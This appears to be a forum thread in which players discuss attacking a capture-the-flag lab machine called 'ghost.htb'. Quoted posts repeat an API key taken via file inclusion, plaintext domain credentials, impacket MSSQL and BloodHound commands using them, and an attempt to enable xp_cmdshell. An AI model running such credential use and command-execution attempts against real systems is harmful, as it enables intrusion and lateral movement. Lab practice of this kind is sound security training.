[JAGS_BLAST]

does anyone know what to do once we have gotten a reverse shell?

[ZeetaOnline]

found not much in 'florence.ramirez@LINUX-DEV-WS01:~$'

florence.ramirez@LINUX-DEV-WS01:~$ ls -la /home/GHOST/florence.ramirez
ls -la /home/GHOST/florence.ramirez
total 8
drwxr-xr-x 2 root root 4096 Feb  1 23:47 .
drwxr-xr-x 3 root root 4096 Feb  1 23:47 ..
lrwxrwxrwx 1 root root    9 Feb  1 23:47 .bash_history -> /dev/null

[maggi]

port 8000 is open on that 172 address in hosts and the 10 just times out.....I was gonna try and see what's there

this one of those rare windows boxes running a linux container or vm.......

[ritualist]

key = '65bc2f4126db7d00010702ca:55466083d9d8ee5a8c424efa944369dd4b573f5cc807011578f6e02695556c40'

Found in the ghost.db using the LFI.
With this you can create a JWT and access the ghost admin API as described at https://ghost.org/docs/admin-api/
Probably not relevant.
There is also a hash for kaythrn but it can't be cracked.

The florence.ramirez ssh credentials are valid domain credentials. With it we can run bloodhound and connect to mssql.

impacket-mssqlclient florence.ramirez:'uxLmt*udNc6t3HrF'@ghost.htb -windows-auth

With mssql we get a useless NTLMv2-SSP Hash and traverse the windows filesystem.

ADFS_GMSA$ and JUSTIN.BRADLEY are remote management users. Probably we have to get to one of those.

[osamy7593]

mssql login with this user and get cmd shell afterthat get windoes shell

---

key = '65bc2f4126db7d00010702ca:55466083d9d8ee5a8c424efa944369dd4b573f5cc807011578f6e02695556c40'

Found in the ghost.db using the LFI.
With this you can create a JWT and access the ghost admin API as described at https://ghost.org/docs/admin-api/
Probably not relevant.
There is also a hash for kaythrn but it can't be cracked.

The florence.ramirez ssh credentials are valid domain credentials. With it we can run bloodhound and connect to mssql.

impacket-mssqlclient florence.ramirez:'uxLmt*udNc6t3HrF'@ghost.htb -windows-auth

With mssql we get a useless NTLMv2-SSP Hash and traverse the windows filesystem.

ADFS_GMSA$ and JUSTIN.BRADLEY are remote management users. Probably we have to get to one of those.

how to enable xp_cmdshell

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Asking for rep is not allowed

[bmoon10]

key = '65bc2f4126db7d00010702ca:55466083d9d8ee5a8c424efa944369dd4b573f5cc807011578f6e02695556c40'

Found in the ghost.db using the LFI.
With this you can create a JWT and access the ghost admin API as described at https://ghost.org/docs/admin-api/
Probably not relevant.
There is also a hash for kaythrn but it can't be cracked.

The florence.ramirez ssh credentials are valid domain credentials. With it we can run bloodhound and connect to mssql.

impacket-mssqlclient florence.ramirez:'uxLmt*udNc6t3HrF'@ghost.htb -windows-auth

With mssql we get a useless NTLMv2-SSP Hash and traverse the windows filesystem.

ADFS_GMSA$ and JUSTIN.BRADLEY are remote management users. Probably we have to get to one of those.

looks like florence.ramirez doesn't have enough permission for xp_cmdshell

SQL (GHOST\florence.ramirez  guest@master)> enable_xp_cmdshell;
[%] exec master.dbo.sp_configure 'show advanced options',1;RECONFIGURE;exec master.dbo.sp_configure 'xp_cmdshell', 1;RECONFIGURE;
[-] ERROR(DC01): Line 105: User does not have permission to perform this action.
[-] ERROR(DC01): Line 1: You do not have permission to run the RECONFIGURE statement.
[-] ERROR(DC01): Line 62: The configuration option 'xp_cmdshell' does not exist, or it may be an advanced option.
[-] ERROR(DC01): Line 1: You do not have permission to run the RECONFIGURE statement.

[osamy7593]

so how to bypass .. someone bypass that way and get a mssql seever shell

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Asking for rep is not allowed

[bmoon10]

bloodhound works with florence.ramirez without mssql server

bloodhound.py -d ghost.htb -c All -ns 10.x.x.x --zip  -u florence.ramirez -p 'uxLmt*udNc6t3HrF' --use-ldap
INFO: Found AD domain: ghost.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (dc01.ghost.htb:88)] [Errno -2] Name or service not known
INFO: Connecting to LDAP server: dc01.ghost.htb
INFO: Found 1 domains
INFO: Found 2 domains in the forest
INFO: Found 2 computers
INFO: Connecting to LDAP server: dc01.ghost.htb
INFO: Found 16 users
INFO: Found 57 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 20 containers
INFO: Found 1 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: linux-dev-ws01.ghost.htb
INFO: Querying computer: DC01.ghost.htb
WARNING: Could not resolve: linux-dev-ws01.ghost.htb: The DNS query name does not exist: linux-dev-ws01.ghost.htb.
INFO: Done in 00M 12S
INFO: Compressing output into 20240714160508_bloodhound.zip

[ZeetaOnline]

so how to bypass .. someone bypass that way and get a mssql seever shell

It could be the Login user is not in the server role ..?? Something similar... its logged under "guest"

[osamy7593]

so how to bypass .. someone bypass that way and get a mssql seever shell

It could be the Login user is not in the server role ..?? Something similar... its logged under "guest"

yes he logged as mysql server account

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Asking for rep is not allowed